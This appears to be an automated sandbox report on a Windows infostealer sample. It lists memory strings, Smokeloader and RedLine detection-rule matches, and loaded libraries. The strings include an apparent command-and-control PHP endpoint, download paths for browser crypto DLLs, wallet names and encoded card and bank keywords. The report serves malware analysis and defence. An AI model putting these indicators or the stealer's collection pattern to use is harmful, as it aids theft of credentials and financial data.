                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/Hs
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/JKEHDBGHIDHIEHDBAAFHJK
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/amData
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/c
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll)
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll8
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dlll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dlln
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dllp
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllF
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllx
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllH
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/es
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/32e011d2eaa85a0/nss3.dllY
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php&
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php-
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php4r#
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php7s&
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php8s/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpCoinomi
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpGs
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpUs
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpa
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpi
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpiYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosK
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpmple-storage.jsoncoOaY
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phption:
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpys
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/ost:
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/ozglue.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.comC
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://support.mozilla.org
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2585700635.000000002349D000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2585700635.000000002349D000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: GIJKKKFC.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2715320097.00000000298F4000.00000004.00000020.00020000.00000000.sdmp, IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2715320097.00000000298F4000.00000004.00000020.00020000.00000000.sdmp, IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                  Source: unknown. HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.4:49737, version: TLS 1.2

                  System Summary

                  Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Smokeloader_3687686f. Author: unknown
                  Source: 00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_RedLineStealer_ed346e4c. Author: unknown
                  Source: 00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Smokeloader_3687686f. Author: unknown
                  Source: 00000000.00000002.2884841467.0000000002DC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_RedLineStealer_ed346e4c. Author: unknown
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe. Code function: 0_2_6CFBED10 malloc, NtFlushVirtualMemory, memset, memset, memset, memset, memset, memcpy, free, memset, memset, memcpy, memset, memset, memset, memset, memset
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe. Code function: 0_2_6CFFB700 NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe. Code function: 0_2_6CFFB8C0 rand_s, NtQueryVirtualMemory
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe. Code function: 0_2_6CFFB910 rand_s, NtQueryVirtualMemory, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error, GetLastError
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe. Code function: 0_2_6CF9F280 NtQueryVirtualMemory, GetProcAddress, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D09ECD00_2_6D09ECD0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D046F100_2_6D046F10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D180F200_2_6D180F20
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0AEF400_2_6D0AEF40
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D102F700_2_6D102F70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D188FB00_2_6D188FB0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D04EFB00_2_6D04EFB0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D11EFF00_2_6D11EFF0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D040FE00_2_6D040FE0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D120E200_2_6D120E20
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0DEE700_2_6D0DEE70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0C6E900_2_6D0C6E90
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D04AEC00_2_6D04AEC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0E0EC00_2_6D0E0EC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0969000_2_6D096900
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0789600_2_6D078960
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1009B00_2_6D1009B0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0D09A00_2_6D0D09A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0FA9A00_2_6D0FA9A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D15C9E00_2_6D15C9E0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0749F00_2_6D0749F0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0908200_2_6D090820
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0CA8200_2_6D0CA820
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1148400_2_6D114840
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1468E00_2_6D1468E0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0E0BA00_2_6D0E0BA0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D146BE00_2_6D146BE0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0EEA000_2_6D0EEA00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0F8A300_2_6D0F8A30
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0BCA700_2_6D0BCA70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0BEA800_2_6D0BEA80
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: String function: 6CFCCBE8 appears 134 times
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: String function: 6CFD94D0 appears 90 times
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: String function: 004043B0 appears 316 times
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: String function: 6D1C09D0 appears 112 times
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903883210.000000006D215000.00000002.00000001.01000000.00000007.sdmp; Binary or memory string: OriginalFilenamenss3.dll0 vs pYJeC4VJbw.exe
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp; Binary or memory string: OriginalFilenamemozglue.dll0 vs pYJeC4VJbw.exe
                  Source: pYJeC4VJbw.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.2884841467.0000000002DC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@1/29@1/1
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_6CFF7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6CFF7030
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_00414DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00414DE0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
                  Source: pYJeC4VJbw.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr; Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr; Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr; Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr; Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: pYJeC4VJbw.exe, pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr; Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr; Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2585700635.0000000023494000.00000004.00000020.00020000.00000000.sdmp, JDBFIIEBGCAKKEBFBAAF.0.dr; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr; Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: pYJeC4VJbw.exe; ReversingLabs: Detection: 65%
                  Source: pYJeC4VJbw.exe; Virustotal: Detection: 46%
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Section loaded: apphelp.dll, msimg32.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, ntmarta.dll, mozglue.dll, wsock32.dll, vcruntime140.dll, msvcp140.dll
